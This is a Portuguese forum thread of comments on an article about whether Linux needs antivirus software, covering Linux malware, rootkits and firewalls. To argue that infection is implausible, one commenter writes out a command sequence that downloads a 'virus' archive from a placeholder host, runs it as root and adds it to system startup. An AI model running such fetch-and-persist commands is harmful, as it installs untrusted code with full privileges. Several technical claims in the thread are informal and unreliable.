"Antivírus" e o Linux

Não dá para negar que sempre teremos pessoas mal intencionadas.
Segurança nunca é demais. Parabéns pelo seu artigo simples e informativo. (:

poderia me informar qual os tipos de vírus vc já encontrou para linux????
como é a lógica deles para serem implantados e diceminados???
e como eles conseguem compatibilidade com as diversas distros diferentes?
são vírus autonomos mesmo que se propagam ou que alguém precisa invadir um determinado computador e implantar o vírus? pois se for necessário alguém invadir para implantar então pela lógica doq é um vírus então isto não seria um vírus seria um binario ou um script espião ou um backdor, lógo a maior segurança estaria no firewall, quanto ao firefox realmente me assustou quando li sobre um teste recente dizendo que o firefox é o mais inseguro, logo instalei o opera que estava como ganhador de segurança e a vantagem dele é q poucos usam então o conhecimento sobre bugs é menor, infelismente isso não é motivo para se sentir plenamente seguro

também nunca vi virus pra linux.

se achar algum me fala.

tambem digo que nao é IMPOSSIVEL um virus para linux, mas digo que é bem improvavel...

A probabilidade é apenas menor e mais controlada, mas eles existem:

http://open-mania.com/2007/11/01/lista-de-virus-e-worms-para-linux/

Mensagem do autor para os amigos Andrémedeiros e Diogovk:

Obrigado por postarem suas opiniões!


Vamos às respostas para as questões levantadas:

1º - Poderia me informar qual os tipos de vírus vc já encontrou para linux?

Resp.: Como a minha rede e o meu Sistema estão protegidos como medida de segurança preventiva com ferramentas Gnu e programas GPL, tais como Nessus, lsoft, nmap, chkrootkit e Ids, além é claro do iptables e alguns plugins no meu navegador, eu digo com absoluta segurança que nenhum.

2º - Como é a lógica deles para serem “implantados e dissimulados”?

Resp.: A lógica para se adentrarem no sistema é muito simples! Em geral são usuários desprevenidos, autoconfiantes e mal-informados das sofisticadas técnicas de invasão como: injeção SQL, cross-site request forgery, poluição de parâmetros http e ações mais corriqueiras como investigação social, Exploits, trojans ( Sim! Existem trojans para Linux e outros sistemas, isso não é só exclusividade do Windows), e os mais perigosos são os rootkits, e o que eles fazem? Exploram vulnerabilidades conhecidas para tentar obter privilégios de root e o mais interessante é que esse controle da máquina pode ser adquirido mesmo numa conta normal de usuário, ataque este preferencialmente comum em sistema doméstico.

3º - E como eles conseguem compatibilidade com as diversas distros diferentes?

Resp.: Por se tratar de um mesmo núcleo (kernel para os íntimos) com aplicativos de sistema, praticamente os mesmos programas e, com a mesma estrutura de diretórios, com raras exceções, eu diria que a “compatibilidade” é grande!



4º - São vírus autonomos mesmo que se propagam ou que alguém precisa invadir um determinado computador e implantar o vírus?

Resp.: Se os vírus são autônomos ou corporativos eu não sei, só espero que eles tenham um bom plano de saúde! (rsrsrsrsrsrs)

5º - Sobre Firewall:

Resp.: De nada adianta se tiver mal-configurado, isso é o mesmo que fechar a porta ao sair e deixar ou esquecer a chave para fora. A porta até está fechada, mas ...

6º – Sobre o Firefox:

Resp.: Se o Firefox fosse tão inseguro assim, a fundação Ubuntu e a Canonical não o teriam escolhido como o navegador padrão da distro. Informe a fonte ou quem escreveu isso e, principalmente em que circunstâncias estes testes foram realizados e qual orgão; se é que existe, homologou o resultado.

7º - Esclarecendo pontos conflitantes:

Conforme dicionário!

Lógica: Coerência racional teórica, modo de raciocinar
Vírus: Agente biológico que pode infectar organismos biológicos

Pela definição da etimologia lógica da palavra; vírus se refere a um ser vivo que infecta seres vivos, computadores são máquinas, logo pela lógica a definição de malware do inglês (Malicius Software) ou num bom português: software malicioso é inapropriado. Porém o termo “vírus” é amplamente utilizado como uma analogia para programas com código malicioso com diferentes tipos e não necessáriamente replicantes, destinado a se infiltrar de forma ilícita, sorrateira e astuta em um sistema computacional independente da plataforma seja: Windows, Linux, FreeBSD, React OS, Mac OS, Seal. Como se pode ver o bolo é bem maior do que parece a princípio! Conforme os sistemas vão avançando em termos de segurança, os atacantes da mesmíssima forma se atualizam proporcionalmente, quer vocês aceitem isso ou não!

Conclusão:

O Linux é de fato muito seguro desde que tomadas certas medidas preventivas! Na minha dica as medidas são simples e não custam nada! É preciso entender que hackers são pessoas altamente especializadas e são exímios programadores com profundo conhecimento em várias áreas, não pensem que os “fabricantes de trojans” que usam o turkojan 4 pra infectar Windows são alguma coisa, não passam de “amebas” que ao se levantar acham que podem ir em qualquer direção! No caso do Linux o cara não é qualquer um, ele sabe exatamente como o sistema funciona e estuda suas vulnerabilidades e que lamento dizer, existe e serão exploradas! Se isso não é suficiente, então pra quê criaram o chkrootkit pra Linux? Pesquisem sobre o assunto, garanto que vão se surpreender!

“Ouça o que digo ou não ouça ninguém”

Lunix.

A grande maioria dos virus para Windows é composta de códigos bem primários, alguns até mesmo idiotas.
Claro que há aqueles melhor elaborados e que parece que têm vida própria, pois tem a capacidade de se esconder, de se multiplicar, de gerar suas próprias mutações, etc. Alguns são verdadeiras obras de arte.
Muitos daqueles virus do primeiro tipo foram desenvolvidos por pessoas sem grande conhecimento, aproveitando-se das facilidades que o ambiente Windows criou para que pudesse funcionar melhor (mas também em contrapartida permitir falhas acessíveis a um público demasiadamente grande).

A grande maioria dos desenvolvedores de virus para Windows não tem capacidade para fazer virus para Linux. Na verdade, a própria Microsoft teve dificuldade de contratar pessoal técnico de nivel MUITO alto, para o desenvolvimento das VBX (Visual Basic Extensions), mais sofisticadas que as famosas DLL.

O que acontece então é que os que criam códigos maliciosos que podem executar em Linux são pessoas de um conhecimento técnico um tanto mais elevado ou específico, que sabem com precisão o que, por que epara que estão fazendo. Não serão meros brincalhões, porém pessoas técnicas e mal-intencionadas, com um propósito fixo.
Portanto, um virus para Linux será potencialmente mais eficaz e perigoso.

Muito bom o seu artigo, ele dá uma superfície bem completa sobre o assunto, pois tem muita gente que acha que não tem vírus pra Linux ;) .Mas em minha opinião é bobagem usar um Antivírus em Linux, pelo menos em um computador residencial, o usuário teria que usar uma série de comandos para se infectar, como por exemplo ele teria que baixar o vírus

wget http://site-do-virus.com/virus.tar.gz

depois ele teria que descompactar

tar -zxvf virus.tar.gz

obviamente entrar no diretório

cd virus

dar a permissão de execução para o arquivo de configuração, se houver...

chmod +x ./configue

executar p/ compilar

./configure

virar root

su

e executar o maldito

# virus

criar um link simbolico do virus para ser inicializado junto com o sistema, de duas formas

#ln -sf /usr/bin/virus /etc/rc.0/virus

ou

#cat > /usr/bin/virus /etc/rc.local


....

Bom, acho que ficou bem explicado ;) Mas o que eu quis dizer com isso tudo é que um usuário leigo, recém-chegado em Linux não vai saber dar os comandos e mt menos se infectar, esse é meu ponto de vista.